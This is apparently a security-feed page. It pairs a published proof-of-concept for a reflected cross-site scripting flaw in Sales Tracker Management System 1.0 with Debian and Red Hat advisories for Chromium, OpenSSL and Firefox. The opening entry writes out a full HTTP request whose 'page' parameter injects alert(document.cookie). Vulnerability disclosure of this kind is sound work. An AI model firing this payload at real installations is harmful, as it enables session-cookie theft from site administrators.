    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

Debian Linux Security Advisory 5377-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5377-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 23, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-1528 CVE-2023-1529 CVE-2023-1530 CVE-2023-1531                 CVE-2023-1532 CVE-2023-1533 CVE-2023-1534Debian Bug     : 1015367 1033015 1033223Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 111.0.5563.110-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQcr7UACgkQEMKTtsN8TjbuARAAlS9yYt7wuAEDkYwDu/aDYURZpuzfRsXQAkH1lANruzc/RWXYZOCnpXC+3C3khe5QvqHkv30n6P2gQi5MEnT1HUnxRkhdXdcf3m+W5lJ0RHSmIntUK1CUXXj52mQ5w3GsGan/gfiYJhrVwOTx6/eKNjt5hv6qXd6ku0rEY/J1SOms83a5WnxxJxoeIMKMqqCXJ4MOEEk+F8qGVgrRV+IJjOmvcUAWgeRcZE28xWlv8dVCd3ouzLPE6TH53mwkQXFXiJ6rn3oiIPvu8m/8zLy1wnHbjn1GRDnNd8d7TdQVX5acmDfw/l1SYILvHXNVMlvq6Rg6+rmo/8RmSU7Bhv4bY7DZ0dRZIjqfFflIjYpaCqbBZavy6+gqrzfLcHukE4WzwpI4dejlgPYP/hYqtR0RVeOFHbecukj8LzRJL/bdjOx+lZz/yzn1i+uIekOvk8i41M3tcoGOT0u0xzgWeyqj+nZpBeCRuLCcqUgSaCP6ywAM/gd7kDqwvy1XMj4tp/MV406Byt6Puog2YzgFmD1bz1EpptSODva/sWf755bCBzR63hVsmtzek3KJi0GkSvzfJe5euppnqfV2Et3rxYuaMQv98UUNV56GaJv8b5y5W/q8ujUXKZOrU6sQJobO7UT0vN4D0EHYTvTsCoSri4fv7VIjAhJmiepzpggx+if/xxY~jM-----END PGP SIGNATURE-----

Debian Security Advisory 5377-1

Red Hat Security Advisory 2023-1440-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1440-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1440  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
openssl-1.1.1g-18.el8_4.src.rpm

aarch64:  
openssl-1.1.1g-18.el8_4.aarch64.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.aarch64.rpm  
openssl-debugsource-1.1.1g-18.el8_4.aarch64.rpm  
openssl-devel-1.1.1g-18.el8_4.aarch64.rpm  
openssl-libs-1.1.1g-18.el8_4.aarch64.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.aarch64.rpm  
openssl-perl-1.1.1g-18.el8_4.aarch64.rpm

ppc64le:  
openssl-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-debugsource-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-devel-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-libs-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-perl-1.1.1g-18.el8_4.ppc64le.rpm

s390x:  
openssl-1.1.1g-18.el8_4.s390x.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.s390x.rpm  
openssl-debugsource-1.1.1g-18.el8_4.s390x.rpm  
openssl-devel-1.1.1g-18.el8_4.s390x.rpm  
openssl-libs-1.1.1g-18.el8_4.s390x.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.s390x.rpm  
openssl-perl-1.1.1g-18.el8_4.s390x.rpm

x86_64:  
openssl-1.1.1g-18.el8_4.x86_64.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.i686.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.x86_64.rpm  
openssl-debugsource-1.1.1g-18.el8_4.i686.rpm  
openssl-debugsource-1.1.1g-18.el8_4.x86_64.rpm  
openssl-devel-1.1.1g-18.el8_4.i686.rpm  
openssl-devel-1.1.1g-18.el8_4.x86_64.rpm  
openssl-libs-1.1.1g-18.el8_4.i686.rpm  
openssl-libs-1.1.1g-18.el8_4.x86_64.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.i686.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.x86_64.rpm  
openssl-perl-1.1.1g-18.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7NzjgjWX9erEAQgfIBAAoZdbDRt1tK2saOKwSBubbkgrG/ObtOka  
yr2fVEt+JUBMWpuJxuUoMxp/tYhsYO0rJTuOXpjcpxGW1mcchp5CSRArNcPX7vrF  
YGWPMPPoAFQFAF5ST4V+jTlRTvhUBmlQlFAQEmogoX/pnqtUdI95rZXY7ELpnhQk  
SNKec7Iw+PcD1JNg80a6J95OjhHtNCM5tLhJgsIrb3kvhmPMzjnSh2UftTXKc1oE  
jzQjxTS9Zj/PZmY8vRnTIeYdx/aXdcjbnSOPnif0QRDiyOmZTdN081UwePbHJk9E  
8QDi72MSsbMuQjfVg6PtP+oZvALcBOxVV431ie3uivF3gosawPjnqUnaPfGK4eY2  
igpSt3KV4gDIlbxK2HhM+Mr+5RhnQ+nN5zY/Z362IAMsKhZ+C+M36K0CksNOZYqF  
56RjgvN4sI/oydTJ21RBBHpAf+Hl3BOpyTo2uj4YwUZY9Oa78VrQ9J+LM6bmP/G4  
1huLqDa8KwDFEsnbVcICHgVk0Iq0ioIK3IBsHhG85XLKPWgvLeSzaBxiwsNxwPlK  
4Wsqm6p60oj9R7xRIVkNatSJj505NXAAN0c2l7/hNUShcyRJqwnxAMO4xvVHlcuL  
aNqzrdA5Ichos1BkHXuT7cZp8nEp3eUPum0IzuPZe/2esOYpmKHCi1ptcSmgbx4u  
Lcf49d75pmE=LYX/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1440-01

Red Hat Security Advisory 2023-1445-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1445-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1445  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
firefox-102.9.0-4.el8_2.src.rpm

aarch64:  
firefox-102.9.0-4.el8_2.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_2.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_2.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_2.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_2.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_2.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_2.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_2.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_2.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQixHg//RWiaOesinr2/sJLEG5HsiPRSNlVGLKDs  
Vz4jRqnM+E1ssJ81zR9IAacb2tRFroYIWfJzCfy3N+gnyJ6MZa8fXmf9P955tNNm  
zTWvRp3pqm6pDDS5wuL/26lMEQu+UwCOIWV7av3QfLTNoNhmUXvQNlcgy5Aamq9m  
WSLdIxNEA+cmeEHuxfaG8vj6lXPH7WtuZ06dB1YP+x8d09HbWrIgSPjVstefEN1A  
vDNrFeYfDeFM/lI6PM50M837fAuUYmcndp5NOn0f3qWtVcCRRFFDED/tPgtjQfN9  
g5Ot+d39s7RILw999HHFg9kNZowjxvs+u/YQJogcUVJd0jZ3hW1Bg6pGwLYs2sBq  
vp4HXNT+xYkXzvDgcO94Sj/lU8jLPJjbUkmISLNjxHdqYDKSza5yrTTucvB/+ZmG  
TeSiyNhy4+XireUkz2IO6n16ZrtbK0KrHERPvSeTXQZ8x5OpScfUvcPLrLe8/AbL  
Tazrl1LJskPWYqLaEQH1M9zhSnAQgUcrva3pIJFIwDZDz3Hzwhur/3o3knVhGWyG  
shNGxJW27BowQrfT2rTJc3RkHCjSHL2QgB5ZHmpZl9p6wxTLlUN8sgP3eTg41zzd  
iPZgpyWgjzOyzTFXB8MCdGzIMDgltpAkNN4e6jRGXTS4QDCzpl4sFW8GM44hiUDp  
v1BFUoMfblo=s9X6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1445-01

Red Hat Security Advisory 2023-1444-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1444-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1444  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
firefox-102.9.0-4.el8_4.src.rpm

aarch64:  
firefox-102.9.0-4.el8_4.aarch64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.aarch64.rpm  
firefox-debugsource-102.9.0-4.el8_4.aarch64.rpm

ppc64le:  
firefox-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debuginfo-102.9.0-4.el8_4.ppc64le.rpm  
firefox-debugsource-102.9.0-4.el8_4.ppc64le.rpm

s390x:  
firefox-102.9.0-4.el8_4.s390x.rpm  
firefox-debuginfo-102.9.0-4.el8_4.s390x.rpm  
firefox-debugsource-102.9.0-4.el8_4.s390x.rpm

x86_64:  
firefox-102.9.0-4.el8_4.x86_64.rpm  
firefox-debuginfo-102.9.0-4.el8_4.x86_64.rpm  
firefox-debugsource-102.9.0-4.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxs7dzjgjWX9erEAQjFAw/+POMLis7JDkGsJrJysMHCnABjVMQOFj2o  
eTv2yQG5FekOOXpbeoR9hNWZmI3EKQ6weJtRSKqcPZHC5vBpoTLAPr1gJ8r6eR6f  
msbEAczb9Qx2b5f6b95bvnWrrdVDOV+hso1QTJZhSSXWtcdiHgX3RnyUx3kvqcCx  
v9aib86RhZBKBt6IsXpNOFjKzR9tGXghHgN6tUrvc1h894GmcC4yjZj5jAcwzyQS  
gOytV4CjzZnfUaU0J2mOs5KW+nt0zmhMC9U/hHBeS5WWGfO4w+psk79GoZi0MBzQ  
DWehVqtblQWO/4eYRnAm2kfKlV9wKoRAXnZfSKfLE2we+R5csIxFNXCSjhXf94c5  
cvNZiLisQj3qDlo0tEZZSNUYV+CUs5Ay2W2ultkBVTqkWcJSwygW+9Ff0SCxTZUA  
1nciKqoCCdc7sh5cy7lyR7S73gDWp1iPpg+1zrEpsrSIQ8pKSmeoXFyKO/ALiEai  
qlCkpjM91uUipDDFuvSC6EyQPmwYzyo3BfPe33pK+eIhDxNnTx8J7aVgH/dfvY7U  
OHkHWWZfzM68zGhFa1ddA2HwghNGVn//g+xrG9U1QJzf83hcLkC6NxIfmkfJODom  
yRgo93DpoCuOtPYp2I8oCEyncmB0D3YOWDzn+k5+BQH7V5dAeHMRiiELjs14Tnqo  
50sdrHMYz/g£8J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux